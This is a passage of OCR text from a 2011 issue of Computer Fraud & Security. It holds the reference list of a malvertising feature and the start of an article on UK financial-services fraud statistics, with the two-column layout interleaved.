of malvertising and the attack strategies interests are in computer security, computer • ‘Pay Per Click’. Wikipedia. Accessed
used to distribute malicious advertise- architecture, web-based distance education Mar 2011. <http://en.wikipedia.org/
ments across domains. Malvertisements and parallel processing. He has two patents wiki/Pay_per_click>.
15
April 2011 Computer Fraud & Security
6. FEATURE
• ‘Active X Controls’. Microsoft. References 4. Sood, AK. ‘Open Redirect Wreck
Accessed Mar 2011. <http://msdn. 1. Cova, M; Kruegel, C; Vigna, G. Off ’. HITB EZine. Accessed Mar
microsoft.com/en-us/library/ ‘Detection and Analysis of Drive- 2011. <http://magazine.hitb.org/
aa751968%28v=vs.85%29. by-Download Attacks and Malicious issues/HITB-Ezine-Issue-004.pdf>.
aspx>. JavaScript Code’. In Proceedings of 5. ‘Same Origin Policy’. W3C. Accessed
• Danchev, Dancho. ‘MSN Norway World Wide Web Conference, 2010. Mar 2011. <http://www.w3.org/
serving Flash exploits through mal- 2. OWASP top 10 Attack Vectors 2010. Security/wiki/Same_Origin_Policy>.
vertising’. ZDNet, 27 Aug 2008. Accessed Mar 2011. <http://www. 6. ‘Client-Side Cross-Domain Security’.
Accessed Mar 2011. <http://www. owasp.org/index.php/Top_10_2010- Microsoft. Accessed Mar 2011.
zdnet.com/blog/security/msn-nor- Main>. <http://msdn.microsoft.com/en-us/
way-serving-flash-exploits-through- 3. Nations, Daniel. ‘What’s the library/cc709423%28v=vs.85%29.
malvertising/1815>. Difference Between a Widget and a aspx>.
• ‘SEO Poisoning Attacks Growing’. Gadget?’. About.com Web Trends. 7. ‘Content Delivery and Distribution
Security Focus, 12 Mar 2008. Accessed Mar 2011. <http://webt- Services’. Web Caching. Accessed
Accessed Mar 2011. <http://www. rends.about.com/od/widgets/a/widget- Mar 2011. <http://www.web-cach-
securityfocus.com/brief/701>. gadget.htm>. ing.com/cdns.html>.
The UK fraud landscape
for financial services
Duncan Ash, SAS UK
Duncan Ash
Fraud in the financial services industry is a topic that constantly makes headlines,
but is the situation really as dire as the media would have us believe? Well, accord-
ing to the recent statistics from the National Fraud Authority (NFA), released 27 ware. The NFA figures show that online
January 2011, fraud is costing the UK over £38bn a year. In particular, the finan- banking has seen an increase of 14%
cial services industry recorded the highest loss to fraudsters at £3.6bn. However, (£60m) in fraud losses compared with the
on a more positive note this actually represented a slight decrease on the 2010 previous year. As such, the sector must
Annual Fraud Indicator figure of £3.8bn due to improved fraud prevention meth- continue to invest in anti-fraud systems
ods involving plastic card fraud (£440m) and cheque fraud (£30m). and solutions to help stay one step ahead
of the criminals.
Reducing levels of card fraud in particular banks and retailers have all contributed to However, because of the great varia-
have been cited as a success story in the the decline in losses. tion between the security levels of online
fight against fraudsters, with the latest sites and the increased measures that
figures from The UK Cards Association A moving target merchants can take to protect them-
(6 October 2010) revealing that total selves, there is a growing acceptance in
fraud losses on UK cards fell to £186.8m Unfortunately, criminals tend to be the banking industry that not all fraud
between January and June 2010 – a 20% opportunistic and are always on the in the online channel can be conquered.
reduction compared with losses in the lookout for the next weak link in the sys- Instead, the industry is positioning itself
first half of 2009. This figure represented tem that can be exploited. According to to pick and choose its battles, ensuring
the lowest half-year total for 10 years, Financial Fraud Action UK (12 January that damage can be limited and con-
and the reduction was attributed to the 2010), more than 50% of regular UK sumer confidence left intact.
success of a number of banking industry Internet users (41.4 million) are now Moreover, the latest Fraudscape report
initiatives. For instance, the increasing banking online. This substantial growth from CIFAS, the UK’s fraud prevention
roll-out of chip and PIN in the UK and in popularity of the online channel in service, issued in March 2011, depicts the
abroad, a greater number of sign-ups to recent years, both in terms of Internet continuing migration of fraud to new sec-
MasterCard SecureCode and Verified by shopping and online banking, has led to tors: fewer bank accounts and plastic cards
Visa by cardholders and retailers, and the an increased number of attacks, in partic- were targeted by fraudsters (15% and 37%
increasing use of fraud detection tools by ular through phishing and financial mal- decreases respectively) only to be offset
16
Computer Fraud & Security April 2011